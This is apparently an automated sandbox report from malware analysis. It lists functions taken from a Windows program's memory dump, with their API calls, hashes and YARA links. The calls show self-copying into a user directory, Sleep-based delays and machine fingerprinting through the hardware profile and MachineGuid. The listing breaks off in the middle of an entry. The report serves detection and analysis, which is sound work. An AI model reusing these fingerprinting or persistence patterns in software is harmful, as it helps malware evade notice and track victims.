
Function 0040CEAC, Relevance: 6.4, APIs: 4, Instructions: 356fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040CECB
__wgetenv.LIBCMT ref: 0040CF08

Part of subcall function 00404DBE: __EH_prolog3.LIBCMT ref: 00404DC5

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 0040D129
CopyFileW.KERNEL32(00000000,?,00000001,?,00000000), ref: 0040D242

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharH_prolog3MultiWide$CopyCreateDirectoryFile__wgetenv
String ID:
API String ID: 77913386-0
Opcode ID: 465783db5a9b6af8966f5c7dd8c1eac739dd4cbdf0b5605c9eec6f29d052fbd6
Instruction ID: 49ef1e2f296ce2aa033c89ac9020bd4aa66a5a4b8edb9ea687151e1575ef9358
Opcode Fuzzy Hash: 465783db5a9b6af8966f5c7dd8c1eac739dd4cbdf0b5605c9eec6f29d052fbd6
Instruction Fuzzy Hash: 2DE13DB280118CEEDB25EFA4CD85EEF777CEF55308F00416AB806A6191DA745B08DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 004645A9, Relevance: 6.1, APIs: 4, Instructions: 100timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004645F9
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00464629
GetLocalTime.KERNEL32(?), ref: 00464656
SystemTimeToFileTime.KERNEL32(?,?), ref: 00464664

Part of subcall function 004640D3: GetFileInformationByHandle.KERNEL32(?,?), ref: 00464108

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: 4142433297cfab27ec47e6641b3520804b18cf2ccb64514be06f0e0fc7beef31
Instruction ID: 58b8f38c4f0396bc80ffe4dbaa39c772d34bd71decc5bd4ad1d4a68e66185b91
Opcode Fuzzy Hash: 4142433297cfab27ec47e6641b3520804b18cf2ccb64514be06f0e0fc7beef31
Instruction Fuzzy Hash: AB316571900B089FDB21DF69C8809AFFBF8FB49314B10492FE596D2650E738E945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00402D9E
__CxxThrowException@8.LIBCMT ref: 00402DB3

Part of subcall function 00467CC1: _malloc.LIBCMT ref: 00467CDB

Strings

8-@, xrefs: 00402DAC

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 8-@
API String ID: 4063778783-2211411525
Opcode ID: 88499271eaf6eafbec96fc3dee59f3f3ca6553b617b3fe397c79274c383d31e8
Instruction ID: 6b18eedb18f0d39473bab3ca1d5a1c3753bda7fac593a15935a7b8e90762b7d9
Opcode Fuzzy Hash: 88499271eaf6eafbec96fc3dee59f3f3ca6553b617b3fe397c79274c383d31e8
Instruction Fuzzy Hash: 1BE03071800209AACF11AF65D9456CD3BA89F00399F10813BA414A51C1E778C6448B89

Uniqueness

Uniqueness Score: -1.00%

Function 0040C97F, Relevance: 5.0, APIs: 4, Instructions: 23sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000022B), ref: 0040C98B
Sleep.KERNEL32(0000006F), ref: 0040C993
Sleep.KERNEL32(0000014D), ref: 0040C99E
Sleep.KERNEL32(000001E4), ref: 0040C9D5

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d7bd20dd804efef325c77db77fb5234fc51949bdaf30a88bc31a2b75510a06d9
Instruction ID: 975e9d9a2a70b5a61a27eafe518d1b07773ddc549889eb8bc10049565a648471
Opcode Fuzzy Hash: d7bd20dd804efef325c77db77fb5234fc51949bdaf30a88bc31a2b75510a06d9
Instruction Fuzzy Hash: 20E01270540280ABE2116BA2DC4FF5F3A68EB41F46F0804BDB601655E2CB785944C7B9

Uniqueness

Uniqueness Score: -1.00%

Function 00464486, Relevance: 4.6, APIs: 3, Instructions: 86fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004644CE
_memmove.LIBCMT ref: 0046451B
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0046453A

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$FileWrite
String ID:
API String ID: 726942401-0
Opcode ID: 4ca8da6bf9422d1f8392b6ac094a96bc5cf74b3d32441c5db8c47ec72a0f7d3c
Instruction ID: 7e5dc5d702286ff7eeeb34c5da44b000f0a5838b87907b751394f6e59b14d481
Opcode Fuzzy Hash: 4ca8da6bf9422d1f8392b6ac094a96bc5cf74b3d32441c5db8c47ec72a0f7d3c
Instruction Fuzzy Hash: 2A218DB1504710AFCB20DF65D985A57BBF8FF84704B14892FE58687A01FA78F904CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004616AB, Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 004616D6
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004616F0
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 004616F6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: fec090b2c73558134462985a25251da8dd622ccc2d6353d43ecaa109f91e5f3d
Instruction ID: e614bf7158e19449fc286036f1a85feeeb3993df36046ab7a2c1016a9562973b
Opcode Fuzzy Hash: fec090b2c73558134462985a25251da8dd622ccc2d6353d43ecaa109f91e5f3d
Instruction Fuzzy Hash: 0201A27160020CAFD710EF68DC84DAEBBBCEB45748F00447EF185D7240DAB49E888BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00465B15, Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,004662B8,?,C:\Users\,0040AFDE,?,00000001,00000000,?,?), ref: 00465B3C
CloseHandle.KERNEL32(?,00000001,?,?,00000000,004662B8,?,C:\Users\,0040AFDE,?,00000001,00000000,?,?), ref: 00465B53
CloseHandle.KERNEL32(?,00000001,?,?,00000000,004662B8,?,C:\Users\,0040AFDE,?,00000001,00000000,?,?), ref: 00465B65

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 0f30a43ee4375dea68cdcf623b185f968058d9e68017a0d952f2ef9038cc8b33
Instruction ID: 4151a1582b03b734edca451e12cb30280c128eae9445182ac3d9c397e7a88907
Opcode Fuzzy Hash: 0f30a43ee4375dea68cdcf623b185f968058d9e68017a0d952f2ef9038cc8b33
Instruction Fuzzy Hash: 9CF06D71A05B444FC7309FA99C80827FBD8AB06611B08897FD18AC3700E675F8448F19

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB5B, Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040DB82
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DB9E
CloseHandle.KERNEL32(00000000), ref: 0040DBA5

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: db052aed866fc49fa48d311194b5377ffa9f929f84bfeaede6320286ba0869f0
Instruction ID: 50ffc64a0e1edf6209753fab437857da183437fdc713fb4b4f9585b25886c2e8
Opcode Fuzzy Hash: db052aed866fc49fa48d311194b5377ffa9f929f84bfeaede6320286ba0869f0
Instruction Fuzzy Hash: AAF0BB72500304BBD7305F65DC48F67BABCEF86B71F104A3AF606A5194D271B945C768

Uniqueness

Uniqueness Score: -1.00%

Function 0040D34F, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 449COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040D356

Part of subcall function 0040326C: std::_Xinvalid_argument.LIBCPMT ref: 00403286

Part of subcall function 0040CEAC: __EH_prolog3.LIBCMT ref: 0040CECB
Part of subcall function 0040CEAC: __wgetenv.LIBCMT ref: 0040CF08

Part of subcall function 0040CEAC: CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 0040D129

Part of subcall function 0040CEAC: CopyFileW.KERNEL32(00000000,?,00000001,?,00000000), ref: 0040D242

Part of subcall function 0040CD8C: CreateDirectoryA.KERNEL32(?,00000000), ref: 0040CDBE

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

(, xrefs: 0040D961

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectoryH_prolog3$CopyFileXinvalid_argument__wgetenv_memmovestd::_
String ID: (
API String ID: 948702957-3887548279
Opcode ID: 3562ddf1546ab578de69f5524938aa2e8102ef14bbea5f86fd8d16765dc88462
Instruction ID: bc4c177d4bdcb12a5e6d9aa6f6a669bd2d2ed84e9a651239416cd8c821f003b5
Opcode Fuzzy Hash: 3562ddf1546ab578de69f5524938aa2e8102ef14bbea5f86fd8d16765dc88462
Instruction Fuzzy Hash: 61023270D05284EACF01BBBEC91716C7E75AB66304F5441BEE40127692DEBE0B1897EB

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F6, Relevance: 3.8, APIs: 3, Instructions: 23sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000214), ref: 0040CA07
Sleep.KERNEL32(00000285), ref: 0040CA19
Sleep.KERNEL32(000001DC), ref: 0040CA2B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f6534a6415d60cb5095f9fad5d11c38104f23c49d5310d161ebf52d413f4bf0d
Instruction ID: 157268666819dda10042423afb61292614c62912a09f0c4728d0bdf19d17359a
Opcode Fuzzy Hash: f6534a6415d60cb5095f9fad5d11c38104f23c49d5310d161ebf52d413f4bf0d
Instruction Fuzzy Hash: 63E01A32B51248EFDB40DFA8E94D69C77B0EB01B02F1048B6E502F21C0D7708B05AB25

Uniqueness

Uniqueness Score: -1.00%

Function 00413D67, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00413D6E

Strings

b>A, xrefs: 00413DB1

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3
String ID: b>A
API String ID: 431132790-4094471207
Opcode ID: 2e8421fc1208da64ebdafc45894692b072e69ed983a8ef4cb98176b2f1920910
Instruction ID: 7dbbd9e80553c64a4419b40bb94cdaf3da263b313658046fe3c933bba2ff40d0
Opcode Fuzzy Hash: 2e8421fc1208da64ebdafc45894692b072e69ed983a8ef4cb98176b2f1920910
Instruction Fuzzy Hash: A5112E706002049FDB10EF59C985AAEBBE5BF44344F54485EF4469B251CBB4EA818B99

Uniqueness

Uniqueness Score: -1.00%

Function 004031A3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004031B2

Part of subcall function 00466492: std::exception::exception.LIBCMT ref: 004664A7
Part of subcall function 00466492: __CxxThrowException@8.LIBCMT ref: 004664BC
Part of subcall function 00466492: std::exception::exception.LIBCMT ref: 004664CD

Strings

string too long, xrefs: 004031AD

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: string too long
API String ID: 1823113695-2556327735
Opcode ID: 02270d166f5240c28fe36f483dd090b4a64d1d260bcbc40c0c7c8055001f94eb
Instruction ID: 0925546d52ee7bd6ab8e8f6c03025d11312490e2419636c23e1c0a328e780988
Opcode Fuzzy Hash: 02270d166f5240c28fe36f483dd090b4a64d1d260bcbc40c0c7c8055001f94eb
Instruction Fuzzy Hash: D6F0C8306042205EDB14BE284C4146A3E496B5A319B214D7BF4A1FF1C2D77ACE82579E

Uniqueness

Uniqueness Score: -1.00%

Function 0045ED55, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0045ED79

Strings

Unknown, xrefs: 0045ED97

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 3c33b70ed4376f9ee22122efa2d4491e8644306d64efc8e7d7020f8625e54449
Instruction ID: 648822408bb7de51779cb388c41a3eea227319543535b6700f643c5e9ac70690
Opcode Fuzzy Hash: 3c33b70ed4376f9ee22122efa2d4491e8644306d64efc8e7d7020f8625e54449
Instruction Fuzzy Hash: 52F0967060030E9FCB10DF659C4059ABBF8EB08348F00447F9541D7241DA74AE088BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00431C24, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00431C28

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

Strings

failed to allocate %u bytes of memory, xrefs: 00431C38

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID: failed to allocate %u bytes of memory
API String ID: 501242067-1168259600
Opcode ID: fdc1be5b37461f03dfe191a79123e67ded48d7b195605e7d8e88e4cd1f67a6d9
Instruction ID: 7d5f281072aa9fc6d1d229093362901ed782b1dda358f127ee1ed544bc62dd18
Opcode Fuzzy Hash: fdc1be5b37461f03dfe191a79123e67ded48d7b195605e7d8e88e4cd1f67a6d9
Instruction Fuzzy Hash: 61C01233A4C23167D6222255FC0265E77509B457A0F11482AFA4855265DA695C61038B

Uniqueness

Uniqueness Score: -1.00%

Function 00402FD3, Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00402FDA
_memmove.LIBCMT ref: 00403070

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3_catch_memmove
String ID:
API String ID: 3914490576-0
Opcode ID: 2d5d30e7ef494da25c39c746c3ef41aa9aecc2780fb985d5ddf5fa19a1bdcf78
Instruction ID: b19b9339b81822e5c9ae6ec3b76913d4bc88423bd0df98bfcf191241bf8c859b
Opcode Fuzzy Hash: 2d5d30e7ef494da25c39c746c3ef41aa9aecc2780fb985d5ddf5fa19a1bdcf78
Instruction Fuzzy Hash: 5F11E431B052019BEB24DF29C94176E7BA6AF84710F20462FE405AB2C5CBB5AE41C799

Uniqueness

Uniqueness Score: -1.00%

Function 0046483D, Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046486F
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004648A7

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: 3cce50dceae1aa74fd6439ca546d8fb43395ef55550b9a1fd0500472fcd58ec6
Instruction ID: 96e658e1209574dea9db3a3f8e20a8502ea41c8967b46568b2f4301c623645e3
Opcode Fuzzy Hash: 3cce50dceae1aa74fd6439ca546d8fb43395ef55550b9a1fd0500472fcd58ec6
Instruction Fuzzy Hash: 01118276600644ABDB21AF65CC04A9B7BE6FF84750F00881EF95987510E631E914CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00465096, Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,00465D54,?,?), ref: 004650D8

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7b876b5a667ac166cc00e06eaf0bb7693e9fd7b8935ec00bbe4c19e3b8d9390b
Instruction ID: 332fa60c5fe0b08c83aea98836a3c228c6d6e1f0753598811112c48aa6a67316
Opcode Fuzzy Hash: 7b876b5a667ac166cc00e06eaf0bb7693e9fd7b8935ec00bbe4c19e3b8d9390b
Instruction Fuzzy Hash: 0D01B171604B04AFD3215F398C84BA7BAD8F746314F10493FF2A692251E67558409B16

Uniqueness

Uniqueness Score: -1.00%

Function 004682E8, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 0046DC1D: __getptd_noexit.LIBCMT ref: 0046DC1D

__lock_file.LIBCMT ref: 0046832F

Part of subcall function 0046A353: __lock.LIBCMT ref: 0046A378

__fclose_nolock.LIBCMT ref: 0046833A

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 088cebdf76918fb0ba66e49a77d64d8043e6a61487218aea8f75b3c6246e9ba1
Instruction ID: fe42d62ebaf6ee97b01b499402ee8af75dfb697eaac23938935278cff4daf6a9
Opcode Fuzzy Hash: 088cebdf76918fb0ba66e49a77d64d8043e6a61487218aea8f75b3c6246e9ba1
Instruction Fuzzy Hash: A8F096318017159ADB10AB76C81275F7BA06F01738F20874EA874AA2D1EF7D8A429F5F

Uniqueness

Uniqueness Score: -1.00%

Function 004717C3, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004717DB

Part of subcall function 00472A09: __mtinitlocknum.LIBCMT ref: 00472A1F
Part of subcall function 00472A09: __amsg_exit.LIBCMT ref: 00472A2B
Part of subcall function 00472A09: EnterCriticalSection.KERNEL32(00000000,00000000,?,004701CA,0000000D), ref: 00472A33

__tzset_nolock.LIBCMT ref: 004717EC

Part of subcall function 004710E2: __lock.LIBCMT ref: 00471104
Part of subcall function 004710E2: ____lc_codepage_func.LIBCMT ref: 0047114B
Part of subcall function 004710E2: __getenv_helper_nolock.LIBCMT ref: 0047116D
Part of subcall function 004710E2: _free.LIBCMT ref: 004711A4
Part of subcall function 004710E2: _strlen.LIBCMT ref: 004711AB
Part of subcall function 004710E2: __malloc_crt.LIBCMT ref: 004711B2
Part of subcall function 004710E2: _strlen.LIBCMT ref: 004711C8
Part of subcall function 004710E2: _strcpy_s.LIBCMT ref: 004711D6
Part of subcall function 004710E2: __invoke_watson.LIBCMT ref: 004711EB
Part of subcall function 004710E2: _free.LIBCMT ref: 004711FA

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: 125bb9abb0f7830946337bb4f7af05fc461ea74480cd6033aa82731b8fd69a96
Instruction ID: dd5ecdc8fd21c7ee7ccd794098a64a212babc6b9e42129f4dd7de9563aa5c882
Opcode Fuzzy Hash: 125bb9abb0f7830946337bb4f7af05fc461ea74480cd6033aa82731b8fd69a96
Instruction Fuzzy Hash: 03E0C2348812509FCF62FBFBAA0278E71646B14B26F20857FB008115E2E9B80941866F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E824, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 0040E827

Part of subcall function 00466B6C: __EH_prolog3.LIBCMT ref: 00466B73
Part of subcall function 00466B6C: std::_Lockit::_Lockit.LIBCPMT ref: 00466B89
Part of subcall function 00466B6C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00466BAB
Part of subcall function 00466B6C: std::locale::_Setgloballocale.LIBCPMT ref: 00466BB5
Part of subcall function 00466B6C: _Yarn.LIBCPMT ref: 00466BCB
Part of subcall function 00466B6C: std::locale::facet::_Incref.LIBCPMT ref: 00466BD8

std::locale::facet::_Incref.LIBCPMT ref: 0040E835

Part of subcall function 0040E7F5: std::_Lockit::_Lockit.LIBCPMT ref: 0040E801

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn
String ID:
API String ID: 2389631691-0
Opcode ID: 42432ce89f2671f8c035c59d1b2cb2485b475ff8260ddd9d722ac8e410d57383
Instruction ID: d169a2634b13c12968bce6bbc9b17cc6a041a619efa8a0a972f232a00ab7a7fe
Opcode Fuzzy Hash: 42432ce89f2671f8c035c59d1b2cb2485b475ff8260ddd9d722ac8e410d57383
Instruction Fuzzy Hash: D2B09265B1023082CE243BBB740648865D84E42B183020C7FB581DB28AFD7DCC41038D

Uniqueness

Uniqueness Score: -1.00%

Function 00439E43, Relevance: 1.8, APIs: 1, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043A0D0

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 143a946d4e1c3027835c9ba1712ea402e4d93ececef6d9a53aeebd294f10cb7b
Instruction ID: a352b675be3c85485bcef34640a4a61f26e1af088cb6765c7283f0c51df9b38a
Opcode Fuzzy Hash: 143a946d4e1c3027835c9ba1712ea402e4d93ececef6d9a53aeebd294f10cb7b
Instruction Fuzzy Hash: CB91D071900616EFDB29DF64C881AAFB3B4BF08314F14512BF855A7341D778AD608BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0044F7A2, Relevance: 1.7, APIs: 1, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675c3f73524ac53dde2a154faf2db46c5fd5c82c3aec0ab12a4424c7e771b61b
Instruction ID: 019664674d38cdfa40b1b2d17baace3ce23b13dafafed176114b85920f0c8fb2
Opcode Fuzzy Hash: 675c3f73524ac53dde2a154faf2db46c5fd5c82c3aec0ab12a4424c7e771b61b
Instruction Fuzzy Hash: ED71D771900205AFEB11AF69D881AAE77B4AF44358F24417FF801AB351DB38DE858B99

Uniqueness

Uniqueness Score: -1.00%

Function 00403DBF, Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00403E8C

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f16fd544f04d0544526c6a47cb7b51eab3a793a71969c410bd097509207d9658
Instruction ID: c26bf15aabc19ed8862159314b8a397f938992ff5a86d3aec1916238bc942b69
Opcode Fuzzy Hash: f16fd544f04d0544526c6a47cb7b51eab3a793a71969c410bd097509207d9658
Instruction Fuzzy Hash: 4C614874200B018FC725CF2DC680A26BBF9BF99314B244A6EE9869BB90D775FD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004619DA, Relevance: 1.7, APIs: 1, Instructions: 158COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00461B33

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: swprintf
String ID:
API String ID: 233258989-0
Opcode ID: 1f124f9d903d13b4af7eecbb89e77ea5fbe996886b9634914658d0689bcf543c
Instruction ID: 4e900e86f930733c935cbc9b698082a78d40380f489c10f1deb3a0b4a47aeaa6
Opcode Fuzzy Hash: 1f124f9d903d13b4af7eecbb89e77ea5fbe996886b9634914658d0689bcf543c
Instruction Fuzzy Hash: 47510672E01309AADF11DFD4D9417DE7BB8EB04754F28451BE841A12B1F6394C448F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004259AA, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 0042407E: _memset.LIBCMT ref: 0042409D

_memset.LIBCMT ref: 004259DA

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: d523acd82d013499d492a5d827290778fb406204d7f75fcb7997390555ed7f1e
Instruction ID: 36e18700b11a96c44ac54dc1a6f4bec4940797c81675ff4bca1e59dfce1b7db2
Opcode Fuzzy Hash: d523acd82d013499d492a5d827290778fb406204d7f75fcb7997390555ed7f1e
Instruction Fuzzy Hash: 80317070B007149FDB20DF29D84279E7BE4EB08764F40861EF859E7380E778E8408B99

Uniqueness

Uniqueness Score: -1.00%

Function 0045EEE9, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0045EF08

Part of subcall function 0045ED55: GetCurrentHwProfileA.ADVAPI32(?), ref: 0045ED79

Part of subcall function 0045EDB3: _memset.LIBCMT ref: 0045EDF5
Part of subcall function 0045EDB3: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 0045EE11
Part of subcall function 0045EDB3: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,?,00000000), ref: 0045EE30
Part of subcall function 0045EDB3: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0045EE39
Part of subcall function 0045EDB3: CharToOemA.USER32(?,?), ref: 0045EE4A

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$CharCloseCurrentH_prolog3OpenProfileQueryValue_memset
String ID:
API String ID: 577691565-0
Opcode ID: 3f8e34f21e2991cab1d540d95d3e53f9081ee7804f8c1732feaa87e1ce63987b
Instruction ID: 558178a07cf669222216c3f630919828ba152484d29c37e65c7891f33e58c0e0
Opcode Fuzzy Hash: 3f8e34f21e2991cab1d540d95d3e53f9081ee7804f8c1732feaa87e1ce63987b
Instruction Fuzzy Hash: 973166B1904149AFDB14EFA9DD41BEE77F8AF54304F00402EB945A32C1DB785A08DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004767C6, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0046BFC8,00000000,?,00000000,00000000,00000000,?,0047025F,00000001,00000214), ref: 00476809

Part of subcall function 0046DC1D: __getptd_noexit.LIBCMT ref: 0046DC1D

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: d68266206670853559c239951daa7b59a10b5375985d87069325e1beb12e9d2c
